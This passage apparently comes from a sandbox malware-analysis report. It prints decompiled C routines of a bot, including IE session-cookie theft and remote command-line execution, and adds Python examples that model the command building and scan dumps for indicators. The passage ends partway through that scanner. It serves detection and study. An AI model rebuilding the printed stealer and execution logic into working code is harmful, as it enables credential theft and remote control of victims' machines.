    										_t208 = E00408C0D((_t151 & 0x0000ffff) + _t269, E0040D3C6((_t151 & 0x0000ffff) + _t269), _t244, _t256 - _t244, 0, 0, 0);
    										__eflags = _t208;
    										if(_t208 == 0) {
    											_a7 = 1;
    										}
    									}
    									_t152 =  *((intOrPtr*)(_t269 + 5));
    									__eflags = _t152;
    									if(_t152 != 0) {
    										_v20 = _v20 + 1;
    										__eflags = (_t152 & 0x000000ff) - _v20;
    										if((_t152 & 0x000000ff) != _v20) {
    											_t44 =  &_a7;
    											 *_t44 = _a7 + 1;
    											__eflags =  *_t44;
    										}
    									}
    									_t153 = _t256;
    									_v28 = _t256;
    									while(1) {
    										__eflags = _t153 - _t219;
    										if(_t153 >= _t219) {
    											break;
    										}
    										_t153 = _t153 + 1;
    										__eflags =  *_t153 - 0x26;
    										_v28 = _t153;
    										if( *_t153 != 0x26) {
    											continue;
    										}
    										break;
    									}
    									__eflags = _a7;
    									if(_a7 != 0) {
    										L39:
    										_t244 = _v28 + 1;
    										__eflags = _v28 + 1;
    										goto L40;
    									}
    									_t246 = _v5 & 0x000000ff;
    									__eflags = _t153 - _t256 - 1 - _t246;
    									if(_t153 - _t256 - 1 != _t246) {
    										goto L39;
    									}
    									_t223 = 0;
    									__eflags = _t246;
    									if(_t246 <= 0) {
    										L38:
    										_t157 = E0040DE73( &_v68, _v12, _v24);
    										__eflags = _t157;
    										if(_t157 != 0) {
    											_t220 = _v5 & 0x000000ff;
    											_v36 = _t256 + 1;
    											_t159 = E0040CF7C( &_v52, _t256 + 1, _t220);
    											 *((char*)(_t275 + _t220 - 0x30)) = 0;
    											_v28 = E0040D180(_t159, _t223);
    											_v20 = 0;
    											_t163 = E00407945( &_v20, _t223, 0,  &_v68);
    											_v12 = _t163;
    											_v24 = 0;
    											__eflags = _t163 & 0x00000003;
    											if((_t163 & 0x00000003) != 0) {
    												_v12 = 0;
    											}
    											_t224 = _v20;
    											_t164 = 4;
    											__eflags = _v12 - _t164;
    											if(_v12 < _t164) {
    												_v12 = _t164;
    											} else {
    												_v24 =  *_t224;
    											}
    											asm("sbb dl, dl");
    											_v12 = _v12 >> 2;
    											_t250 =  ~(_v24 % ( *(_t269 + 4) & 0x000000ff)) + 1;
    											_t261 = 1;
    											_a7 = _t250;
    											__eflags = _v12 - 1;
    											if(_v12 <= 1) {
    												L53:
    												__eflags = _t250;
    												if(_t250 <= 0) {
    													L62:
    													_t167 =  *0x412a64; // 0x246f5a8
    													_v6 = 1;
    													__eflags = _t250 - 1;
    													if(_t250 != 1) {
    														_t168 =  *((intOrPtr*)(_t167 + 0x17c));
    													} else {
    														_t168 =  *((intOrPtr*)(_t167 + 0x178));
    													}
    													_a8 = _t168;
    													_t169 = E0040D3C6(_t168);
    													_t262 = _a16;
    													_t271 = _a12;
    													_v16 = _t169;
    													_t171 = E0040CED8( *_t262 + _t220 + _t169 + 0x14, _t271);
    													__eflags = _t171;
    													if(_t171 != 0) {
    														wnsprintfA( &_v52, 0xf, "%%0%uu", _t220);
    														wnsprintfA( &_v84, 0xf,  &_v52, _v28);
    														 *_t262 =  *_t262 + E0040CF7C( *_t271 +  *_t262, _a8, _v16);
    														E0040CF7C( *_t271 +  *_t262,  &_v84, _t220);
    														_t191 =  *_t262 + _t220;
    														 *((char*)(_t191 +  *_t271)) = 0xa;
    														_t192 = _t191 + 1;
    														__eflags = _t192;
    														 *_t262 = _t192;
    													}
    													L68:
    													_t263 = _v12;
    													_t124 = _t263 + 4; // 0x6
    													_t173 = E0040CED8(_t124,  &_v20);
    													_t273 = _v20;
    													__eflags = _t173;
    													if(_t173 != 0) {
    														__eflags = _a7 - 2;
    														if(_a7 != 2) {
    															_t180 = _v24 + 1;
    															__eflags = _t180;
    															 *_t273 = _t180;
    														}
    														_t176 = _t263 << 2;
    														 *((intOrPtr*)(_t176 + _t273)) = _v28;
    														__eflags = _t176 + 4;
    														E004079B5(_t176 + 4, _t176 + 4, 0,  &_v68, _t273);
    													}
    													E0040CF40(_t273);
    													goto L73;
    												}
    												_t264 = E0040CF93( *((intOrPtr*)(_a8 + 0x418)),  *((intOrPtr*)(_a8 + 0x41c)));
    												_v16 = _t264;
    												__eflags = _t264;
    												if(_t264 == 0) {
    													goto L68;
    												}
    												_t251 = _a8;
    												_t266 = _t264 -  *((intOrPtr*)(_a8 + 0x418)) + _v36;
    												__eflags =  *(_t269 + 2) & 0x00000001;
    												if(__eflags == 0) {
    													E0040CFFE(_t194, _t266, 0x31, _t220);
    													L60:
    													_t196 = E0040A944(_t251, __eflags, _v16,  *((intOrPtr*)(_t251 + 0x41c)));
    													__eflags = _t196;
    													if(_t196 == 0) {
    														E0040CF40(_v16);
    														goto L68;
    													}
    													_t250 = _a7;
    													goto L62;
    												}
    												_t274 = _t220 + _t266;
    												__eflags = _t266 - _t274;
    												if(__eflags >= 0) {
    													goto L60;
    												} else {
    													goto L57;
    												}
    												do {
    													L57:
    													_push(0x30);
    													_t198 = 0x39;
    													 *_t266 = E0040DF51(_t198);
    													_t266 = _t266 + 1;
    													__eflags = _t266 - _t274;
    												} while (__eflags < 0);
    												_t251 = _a8;
    												goto L60;
    											} else {
    												while(1) {
    													__eflags =  *((intOrPtr*)(_t224 + _t261 * 4)) - _v28;
    													if( *((intOrPtr*)(_t224 + _t261 * 4)) == _v28) {
    														break;
    													}
    													_t261 = _t261 + 1;
    													__eflags = _t261 - _v12;
    													if(_t261 < _v12) {
    														continue;
    													}
    													goto L53;
    												}
    												_a7 = 2;
    												_t250 = _a7;
    												goto L53;
    											}
    										}
    										goto L39;
    									} else {
    										goto L35;
    									}
    									while(1) {
    										L35:
    										_t202 =  *((intOrPtr*)(_t223 + _t256 + 1));
    										__eflags = _t202 - 0x30;
    										if(_t202 < 0x30) {
    											goto L39;
    										}
    										__eflags = _t202 - 0x39;
    										if(_t202 > 0x39) {
    											goto L39;
    										}
    										_t223 = _t223 + 1;
    										__eflags = _t223 - _t246;
    										if(_t223 < _t246) {
    											continue;
    										}
    										goto L38;
    									}
    									goto L39;
    								}
    								goto L73;
    							}
    							_t239 = (_t148 & 0x0000ffff) + _t269;
    							__eflags =  *_t239 - 0x2a;
    							if( *_t239 != 0x2a) {
    								L12:
    								_t210 = E00408C0D(_t239, E0040D3C6(_t239),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
    								__eflags = _t210;
    								if(_t210 == 0) {
    									goto L15;
    								}
    								goto L13;
    							}
    							__eflags =  *(_t239 + 1);
    							if( *(_t239 + 1) == 0) {
    								goto L15;
    							}
    							goto L12;
    						}
    						_t212 = E00408C0D((_t147 & 0x0000ffff) + _t269, E0040D3C6((_t147 & 0x0000ffff) + _t269),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
    						__eflags = _t212;
    						if(_t212 == 0) {
    							goto L13;
    						}
    						goto L9;
    					}
    					goto L73;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: %%0%uu
    • API String ID: 0-1393091064
    • Opcode ID: c9fec5f46d24fa384b4efc5c11ab46135bbf1a9eaf2cac4a9e6edbf37a297d21
    • Instruction ID: b209e006af3860eb183c6da625e3960b69cd8ea8497dbe43eaa5c4caeecce437
    • Opcode Fuzzy Hash: c9fec5f46d24fa384b4efc5c11ab46135bbf1a9eaf2cac4a9e6edbf37a297d21
    • Instruction Fuzzy Hash: C2D10570904349AFDF11DFA4C880AFEBBB6AF05304F14807AE591BB2C1D7389956CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0040707A(short _a4, signed int _a8, char* _a16, int _a20) {
    				char _v5;
    				WCHAR* _v12;
    				intOrPtr _v40;
    				intOrPtr _v48;
    				char _v56;
    				short _v576;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t39;
    				signed char _t41;
    				char _t43;
    				void* _t45;
    				WCHAR _t48;
    				void* _t50;
    				short* _t51;
    				long _t53;
    				signed int _t65;
    				short _t71;
    				short _t72;
    				int _t74;
    				WCHAR* _t76;
    
    				// Builds a UTF-16 command line of the form "<path>" <args> and hands it to E00409CF9
    				// with a first argument of 1 for command bytes 'C' (0x43) and 'E' (0x45) and 0 for 'D' (0x44).
    				// 'C'/'D' take the path from E004098D3 and turn E0040D9EB's result (sbb/neg idiom) into the
    				// failure flag _v5; any other command byte runs *_a8 through ExpandEnvironmentStringsW
    				// (0x104 = MAX_PATH WCHARs) and never sets _v5. _t65 is the path length including the
    				// terminating NUL, so with E0040CF7C returning the byte count it copied the closing quote
    				// overwrites that NUL at _t76 + 2*_t65 and the arguments start at _t76 + 2*_t65 + 4, right
    				// after the space. The heap block comes zero-filled (E0040CF2D = RtlAllocateHeap, flag 8),
    				// which supplies the final NUL. _t22, _t25, _t46 and _t60 are decompiler temporaries the
    				// listing never declares; _t60 is freed with E0040CF40 (HeapFree per the APIs list).
    				// The /* */ prefix on each statement is the instruction address the report attaches to it.
    				/* 0x0040708b */ _v5 = 0;
    				/* 0x0040708f */ if(_a4 == 0x43 || _a4 == 0x44) {
    				/* 0x004070ce */ 	E004098D3( &_v576);
    				/* 0x004070e3 */ 	_t65 = E0040D3D8( &_v576) + 1;
    				/* 0x004070e4 */ 	E00410649( &_v56);
    				/* 0x004070ee */ 	_v40 =  *_a8;
    				/* 0x004070f1 */ 	_t39 =  *0x412974; // 0x0
    				/* 0x004070f6 */ 	_v48 = _t39;
    				/* 0x00407103 */ 	_v12 =  &_v576;
    				/* 0x00407106 */ 	_t41 = E0040D9EB(_t65,  &_v56, __eflags, 0);
    				/* 0x0040710d */ 	asm("sbb al, al");
    				/* 0x0040710f */ 	_t43 =  ~_t41 + 1;
    				/* 0x0040710f */ 	__eflags = _t43;
    				/* 0x00407111 */ 	_v5 = _t43;
    				/* 0x00407098 */ } else {
    				/* 0x004070bb */ 	_t65 = ExpandEnvironmentStringsW(E0040D379(_a8 | 0xffffffff,  *_a8),  &_v576, 0x104);
    				/* 0x004070bd */ 	E0040CF40(_t60);
    				/* 0x004070c2 */ 	_t43 = _v5;
    				/* 0x004070c2 */ }
    				/* 0x00407116 */ if(_t65 != 0 && _t43 == 0) {
    				/* 0x00407124 */ 	_t74 = _a20;
    				/* 0x00407127 */ 	_t45 = _t65 + _t74;
    				/* 0x0040712a */ 	_t46 = _t45 + _t45 + 0x14;
    				/* 0x00407130 */ 	if(_t45 + _t45 + 0x14 != 0) {
    				/* 0x0040713b */ 		_t76 = E0040CF2D(_t46);
    				/* 0x00407132 */ 	} else {
    				/* 0x00407132 */ 		_t76 = 0;
    				/* 0x00407132 */ 	}
    				/* 0x0040713f */ 	_t48 = 0x22;
    				/* 0x00407140 */ 	 *_t76 = _t48;
    				/* 0x0040714e */ 	_t22 = _t76 + 2; // 0x2
    				/* 0x00407152 */ 	_t50 = E0040CF7C(_t22,  &_v576, _t65 + _t65);
    				/* 0x00407159 */ 	_t51 = _t50 + _t76;
    				/* 0x0040715b */ 	_t71 = 0x22;
    				/* 0x0040715c */ 	 *_t51 = _t71;
    				/* 0x00407161 */ 	if(_t74 != 0) {
    				/* 0x00407165 */ 		_t72 = 0x20;
    				/* 0x00407167 */ 		 *((short*)(_t51 + 2)) = _t72;
    				/* 0x0040716b */ 		_t25 = _t65 * 2; // 0x4
    				/* 0x00407178 */ 		MultiByteToWideChar(0, 0, _a16, _t74, _t76 + _t25 + 4, _t74);
    				/* 0x00407178 */ 	}
    				/* 0x00407183 */ 	if(_a4 == 0x43 || _a4 == 0x45) {
    				/* 0x00407192 */ 		_t53 = 1;
    				/* 0x00407192 */ 		__eflags = 1;
    				/* 0x0040718c */ 	} else {
    				/* 0x0040718c */ 		_t53 = 0;
    				/* 0x0040718c */ 	}
    				/* 0x00407197 */ 	E00409CF9(_t53, 0, _t76);
    				/* 0x0040719d */ 	E0040CF40(_t76);
    				/* 0x004071a2 */ 	_t43 = _v5;
    				/* 0x004071a2 */ }
    				/* 0x004071b2 */ return 0 | _t43 == 0x00000000;
    			}

    APIs
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?), ref: 004070B4
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000004,?,00000002,?,00000022,00000000,?), ref: 00407178
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ByteCharEnvironmentExpandFreeHeapMultiStringsWide
    • String ID: E
    • API String ID: 4193686461-3568589458
    • Opcode ID: 98c5ac30b2654fff8d877c05c642aba67df397f5a5144a1fcc36f5923742fe11
    • Instruction ID: 0a80c66c422c91f9f59ccba2c4feb8961f0da65f778ddf862aa9fa3feba8c548
    • Opcode Fuzzy Hash: 98c5ac30b2654fff8d877c05c642aba67df397f5a5144a1fcc36f5923742fe11
    • Instruction Fuzzy Hash: F831D931904204AADB11EFB4D845FDA77B8DF05304F10816BF505FB2D2D7789A49C79A
    Uniqueness

    Uniqueness Score: -1.00%
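The routine above only assembles a string, so the quickest way to see what E00409CF9 receives for each command byte is to model the assembly step. The following Python is an added example for this page, not code from the sample or from the Joe Sandbox report; it assumes that E004098D3 yields a path the bot already holds for the 'C'/'D' commands (the decompilation does not show what it writes), models the CP_ACP conversion done by MultiByteToWideChar as cp1252, and uses its own names (expand_env, build_command_line, own_path).

```python
import re

# Byte values the decompiled routine compares _a4 against and writes into the buffer.
CMD_C, CMD_D, CMD_E = 0x43, 0x44, 0x45     # ASCII 'C', 'D', 'E'
QUOTE, SPACE = chr(0x22), chr(0x20)        # written as 16-bit WCHARs at _t76 and _t51 + 2
MAX_PATH = 0x104                           # WCHAR capacity handed to ExpandEnvironmentStringsW


def expand_env(text, env):
    """%NAME% expansion in the style of ExpandEnvironmentStringsW: names that
    are not present in env are copied through unchanged, as the API does."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1), m.group(0)), text)


def build_command_line(cmd, target, args, env, own_path):
    """Model of E0040707A.

    Returns (command_line, flag), flag being the first argument the routine
    passes to E00409CF9, or None where the routine never reaches that call.
      cmd      -- the command byte (_a4)
      target   -- the string at *_a8 (only used outside the 'C'/'D' branch)
      args     -- the ANSI bytes _a16[:_a20] converted with MultiByteToWideChar
      own_path -- stand-in for what E004098D3 fills into _v576 (assumption:
                  a path the bot already holds; the listing does not show it)
    """
    if cmd in (CMD_C, CMD_D):
        path = own_path
    else:
        path = expand_env(target, env)
        # ExpandEnvironmentStringsW reports the size it would need when 0x104
        # WCHARs are too few; this model simply stops there.
        if len(path) + 1 > MAX_PATH:
            return None
    if not path:            # _t65 == 0: nothing is allocated or executed
        return None
    # The buffer is 2*(len+1+arglen)+0x14 bytes from a HEAP_ZERO_MEMORY block
    # (RtlAllocateHeap flag 8 in the subcall line), so the final NUL is the zero
    # fill. Layout: '"', path, '"', ' ', args.
    line = QUOTE + path + QUOTE
    if args:
        line += SPACE + args.decode("cp1252", errors="replace")   # CP_ACP modelled as cp1252
    flag = 1 if cmd in (CMD_C, CMD_E) else 0
    return line, flag


if __name__ == "__main__":
    env = {"SystemRoot": r"C:\Windows"}      # constructed environment
    print(build_command_line(CMD_E, r"%SystemRoot%\system32\cmd.exe", b"/c whoami", env, r"C:\bot.exe"))
    print(build_command_line(CMD_D, "ignored", b"", env, r"C:\bot.exe"))
```

The resulting string is the shape to look for in process-creation telemetry: the target is always quoted, the arguments are appended after exactly one space, and a 'D' command differs from 'C'/'E' only in the flag handed to E00409CF9, not in the command line.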

    C-Code - Quality: 72%
    			E00404001(void* __ebx) {
    				char _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				void* __esi;
    				signed int _t18;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t34;
    				intOrPtr _t35;
    				intOrPtr _t36;
    				void* _t37;
    				void* _t39;
    				signed int _t40;
    				void* _t42;
    				void* _t47;
    
    				// Joins the string array at 0x4126e4 (element count at 0x4126e0) into one
    				// space-separated buffer (_t40, regrown with E0040CED8 for every element) while
    				// holding the critical section at 0x4126c8; 0x412dd4/0x412dd8 are the
    				// RtlEnterCriticalSection/RtlLeaveCriticalSection imports per the APIs list.
    				// The buffer is then passed together with the literal "PopOpO03-3331111" to
    				// E004079B5 and freed (E0040CF40 = HeapFree). _t23 is an undeclared decompiler
    				// temporary. The /* */ prefix is the instruction address the report gives each statement.
    				/* 0x00404009 */ _t40 = 0;
    				/* 0x00404010 */ _t37 = 0;
    				/* 0x00404012 */ _v8 = 0;
    				/* 0x00404015 */  *0x412dd4(0x4126c8);
    				/* 0x0040401b */ _t18 = 0;
    				/* 0x0040401d */ _v16 = 0;
    				/* 0x00404020 */ _t42 =  *0x4126e0 - _t37; // 0x0
    				/* 0x00404026 */ if(_t42 <= 0) {
    				/* 0x00404094 */ 	L9:
    				/* 0x00404099 */ 	 *0x412dd8(0x4126c8);
    				/* 0x004040a9 */ 	E004079B5(_t37, _t47, 0, "PopOpO03-3331111", _t40);
    				/* 0x004040b7 */ 	return E0040CF40(_t40);
    				/* 0x004040b7 */ }
    				/* 0x00404029 */ do {
    				/* 0x00404029 */ 	_t35 =  *0x4126e4; // 0x0
    				/* 0x0040402f */ 	_t23 = _t35 + _t18 * 4;
    				/* 0x00404035 */ 	if( *(_t35 + _t18 * 4) != 0) {
    				/* 0x00404041 */ 		_t36 = E0040D312(_t23 | 0xffffffff,  *_t23);
    				/* 0x00404043 */ 		_v12 = _t36;
    				/* 0x00404048 */ 		if(_t36 != 0) {
    				/* 0x0040404a */ 			_t27 = E0040D3C6(_t36);
    				/* 0x0040404f */ 			_t34 = _t27 + _t37;
    				/* 0x00404052 */ 			_v20 = _t27;
    				/* 0x0040405b */ 			_t29 = E0040CED8(_t34 + 1,  &_v8);
    				/* 0x00404060 */ 			_t40 = _v8;
    				/* 0x00404065 */ 			if(_t29 != 0) {
    				/* 0x00404070 */ 				E0040CF7C(_t37 + _t40, _v12, _v20);
    				/* 0x00404075 */ 				_t39 = _t34;
    				/* 0x00404077 */ 				 *((char*)(_t39 + _t40)) = 0x20;
    				/* 0x0040407b */ 				_t37 = _t39 + 1;
    				/* 0x0040407b */ 			}
    				/* 0x0040407f */ 			E0040CF40(_v12);
    				/* 0x0040407f */ 		}
    				/* 0x00404048 */ 	}
    				/* 0x00404087 */ 	_t18 = _v16 + 1;
    				/* 0x00404088 */ 	_v16 = _t18;
    				/* 0x0040408b */ 	_t47 = _t18 -  *0x4126e0; // 0x0
    				/* 0x0040408b */ } while (_t47 < 0);
    				/* 0x00000000 */ goto L9;
    			}

    APIs
    • RtlEnterCriticalSection.NTDLL(004126C8), ref: 00404015
    • RtlLeaveCriticalSection.NTDLL(004126C8), ref: 00404099
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: PopOpO03-3331111
    • API String ID: 3168844106-962168976
    • Opcode ID: a399a5be5b79f228f6b5957928eaabb3e15bb6ba2569f476f18499c359079621
    • Instruction ID: ae964b88e9df782e84ff779e792d65f5708a30c7ed2cc99191e8c98e3c5d5506
    • Opcode Fuzzy Hash: a399a5be5b79f228f6b5957928eaabb3e15bb6ba2569f476f18499c359079621
    • Instruction Fuzzy Hash: 4511CD31A00119EECB11EFAACD41ADE7BB5FF85314B10017AE604F72E1D7785A518B59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040A193(void* __ecx, void* __edx, void* __esi, char* _a4) {
    				long _v8;
    				int _t14;
    				char* _t23;
    
    				// Two-step InternetGetCookieA pattern: the first call with a NULL buffer only
    				// fills _v8 with the required size, E0040CF2D allocates that many bytes
    				// (RtlAllocateHeap with flag 8 = HEAP_ZERO_MEMORY per the subcall line) and the
    				// second call fetches the cookie string for the URL in _a4. The result is
    				// reported through E00410EC7 with the format L"%S\r\nIE session cookies:\r\n%S"
    				// (URL first, then the cookies pushed as _t23). _t11 and _t30 are undeclared
    				// decompiler temporaries. The /* */ prefix is the instruction address per statement.
    				/* 0x0040a196 */ _push(__ecx);
    				/* 0x0040a1ab */ if(InternetGetCookieA(_a4, 0, 0,  &_v8) != 0) {
    				/* 0x0040a1ad */ 	_t11 = _v8;
    				/* 0x0040a1b2 */ 	if(_v8 != 0) {
    				/* 0x0040a1ba */ 		_t23 = E0040CF2D(_t11);
    				/* 0x0040a1be */ 		if(_t23 != 0) {
    				/* 0x0040a1c9 */ 			_t14 = InternetGetCookieA(_a4, 0, _t23,  &_v8);
    				/* 0x0040a1cf */ 			_t30 = _t14;
    				/* 0x0040a1d1 */ 			if(_t14 != 0) {
    				/* 0x0040a1d3 */ 				_push(_t23);
    				/* 0x0040a1e0 */ 				E00410EC7(__ecx, __edx, _t30, 1, 0, 0, L"%S\r\nIE session cookies:\r\n%S", _a4);
    				/* 0x0040a1e5 */ 			}
    				/* 0x0040a1e9 */ 			E0040CF40(_t23);
    				/* 0x0040a1e9 */ 		}
    				/* 0x0040a1ee */ 	}
    				/* 0x0040a1b2 */ }
    				/* 0x0040a1f0 */ E00404BC8(0);
    				/* 0x0040a1fc */ return E00404803();
    			}

    APIs
    • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040A1A3
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040A1C9
    Strings
    • %S\r\nIE session cookies:\r\n%S, xrefs: 0040A1D7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CookieInternet$AllocateHeap
    • String ID: %SIE session cookies:%S
    • API String ID: 1720872598-348586552
    • Opcode ID: f672de692fdeaac871ec7c5d2309e232fbc017f3ea6e1157c339adceb9adaa80
    • Instruction ID: e5454a37bb16cc1a739e33ce88ca83c7f2a48920d0eefd30366c5ec76bd7e26e
    • Opcode Fuzzy Hash: f672de692fdeaac871ec7c5d2309e232fbc017f3ea6e1157c339adceb9adaa80
    • Instruction Fuzzy Hash: EFF0AFB2200104B6C730BB6BCC49DDF3E6DDFC2B41B00023AF908A5181EA798B51D2BE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F4CE(intOrPtr _a4, intOrPtr _a12) {
    				short _v524;
    				void* __edi;
    				int _t23;
    				intOrPtr _t24;
    
    				// Obtains a unique temporary name with prefix "cab" in the directory at
    				// _a12 + 0x746 (GetTempFileNameW with uUnique 0 also creates the file), then
    				// E0040DD3C removes it again (SetFileAttributesW(..., 0x20 = FILE_ATTRIBUTE_ARCHIVE,
    				// which drops read-only/hidden/system, followed by DeleteFileW per the subcall
    				// lines). The bare file name is written into _a4 as the narrow string "?T\<name>":
    				// the two bytes "?T", a backslash (0x5c) at offset 2 and the name converted by
    				// E0040D2F3 (WideCharToMultiByte) from offset 3 on. The /* */ prefix is the
    				// instruction address the report gives each statement.
    				/* 0x0040f4e2 */ _t23 = 0;
    				/* 0x0040f4f8 */ if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040DD3C( &_v524) != 0) {
    				/* 0x0040f50a */ 	_t24 = _a4;
    				/* 0x0040f520 */ 	E0040D2F3(PathFindFileNameW( &_v524), _t24 + 3);
    				/* 0x0040f52d */ 	E0040CF7C(_t24, "?T", 2);
    				/* 0x0040f532 */ 	 *((char*)(_t24 + 2)) = 0x5c;
    				/* 0x0040f538 */ 	_t23 = 1;
    				/* 0x0040f539 */ }
    				/* 0x0040f53e */ return _t23;
    			}

    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040F4F0
      • Part of subcall function 0040DD3C: SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
      • Part of subcall function 0040DD3C: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 0040F518
      • Part of subcall function 0040D2F3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,0040F525,?,?), ref: 0040D306
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: 9693c0407248871a2c48f834560001864496959ee0a55fc4fcb4affdf8d58cc2
    • Instruction ID: 0e97196fcce3285a1a30ce9ec0008965205565818f1a31b4e5b8f163ac32ee4b
    • Opcode Fuzzy Hash: 9693c0407248871a2c48f834560001864496959ee0a55fc4fcb4affdf8d58cc2
    • Instruction Fuzzy Hash: BFF0A437A4032467CB20AFA8DC09FCB7BAC9F05745F004576B959F31C2DA78EA098694
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 16%
    			E0040541D() {
    
    				// Under the critical section at 0x412708 (0x412dd4/0x412dd8 resolve to
    				// RtlEnterCriticalSection/RtlLeaveCriticalSection per the APIs list) frees the
    				// buffer held in 0x412728 (E0040CF40 = HeapFree) and clears the globals at
    				// 0x412720, 0x412728 and 0x412704; `x = x & 0` is the decompiler's rendering of
    				// `and [mem], 0`. The /* */ prefix is the instruction address per statement.
    				/* 0x00405424 */  *0x412dd4(0x412708);
    				/* 0x00405430 */ E0040CF40( *0x412728);
    				/* 0x00405437 */  *0x412720 =  *0x412720 & 0;
    				/* 0x0040543d */  *0x412728 =  *0x412728 & 0;
    				/* 0x00405444 */  *0x412704 = 0;
    				/* 0x0040544a */  *0x412dd8(0x412708);
    				/* 0x00405451 */ return 0;
    			}

    APIs
    • RtlEnterCriticalSection.NTDLL(00412708), ref: 00405424
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • RtlLeaveCriticalSection.NTDLL(00412708), ref: 0040544A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterFreeHeapLeave
    • String ID: rsldps
    • API String ID: 3296397286-2437408065
    • Opcode ID: 9daea3a1931503759bf2de641527713b49afd8e623dac153174ee1ed69bfbea8
    • Instruction ID: 274a606839fa3967768612f91037daebffa198f8dba70c0c0ea7218726266eb8
    • Opcode Fuzzy Hash: 9daea3a1931503759bf2de641527713b49afd8e623dac153174ee1ed69bfbea8
    • Instruction Fuzzy Hash: 54D092328615219B8B026BA4FF464D737E9EF0A266300D077F520D20F0D7F908E18BAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411018(WCHAR* _a4) {
    
    				// Copies the wide string at 0x413260 into the caller's buffer _a4 and appends
    				// L".lll"; lstrcpyW/lstrcatW do no bounds checking, so the caller sizes the
    				// buffer. The /* */ prefix is the instruction address the report gives each statement.
    				/* 0x00411021 */ lstrcpyW(_a4, 0x413260);
    				/* 0x00411036 */ return lstrcatW(_a4, L".lll");
    			}

    APIs
    • lstrcpyW.KERNEL32(00411377,00413260), ref: 00411021
    • lstrcatW.KERNEL32(?,.lll), ref: 00411030
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: lstrcatlstrcpy
    • String ID: .lll
    • API String ID: 3905823039-2905095309
    • Opcode ID: 8028da1338b692a4fe11208eea41a88aca15c5e5d283de1ea6690db6da0ff1d4
    • Instruction ID: b9f9ebfaa2702b7983b9e6894d3e7aae2c5c32b632de3cc78fd48e4ec5ca6948
    • Opcode Fuzzy Hash: 8028da1338b692a4fe11208eea41a88aca15c5e5d283de1ea6690db6da0ff1d4
    • Instruction Fuzzy Hash: 30C04C71148205ABC6015F10DD09E4DBE61AB50746B10C435B24590170DBB546B1EB5D
    Uniqueness

    Uniqueness Score: -1.00%
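Several of the routines in this section (E00404001, E0040A193, E0040F4CE, E00411018, and the String ID listed just before E0040707A) embed fixed literals, some narrow and some UTF-16. A scanner that searches a dump for those literals in the encoding the code actually uses is a practical way to re-find this code in other memory dumps or samples. The Python below is an added example, not code from the sample or from the Joe Sandbox report: the indicator list is copied from the listings above, the byte blob SAMPLE_DUMP is constructed for the demonstration and stands in for the .sdmp file named in each Memory Dump Source line, and the rule that short atoms such as "cab" and "?T" only count when a longer literal is also present is this example's own thresholding choice.

```python
# (text, encoding in the binary, routine on this page that references it)
INDICATORS = [
    ("PopOpO03-3331111", "ascii", "E00404001"),         # narrow literal handed to E004079B5
    ("IE session cookies:", "utf-16-le", "E0040A193"),  # part of L"%S\r\nIE session cookies:\r\n%S"
    ("%%0%uu", "ascii", "routine preceding E0040707A"),  # String ID of the listing above E0040707A
    (".lll", "utf-16-le", "E00411018"),                 # lstrcatW suffix
    ("cab", "utf-16-le", "E0040F4CE"),                  # GetTempFileNameW prefix
    ("?T", "ascii", "E0040F4CE"),                       # two narrow bytes written before the '\\'
]

# Atoms this short occur in ordinary data; they are only reported alongside a
# longer hit (assumption made by this example, not a property of the sample).
WEAK_ATOMS = {"cab", "?T"}


def find_all(haystack, needle):
    """Every offset of needle in haystack, overlapping matches included."""
    hits, start = [], 0
    while True:
        i = haystack.find(needle, start)
        if i < 0:
            return hits
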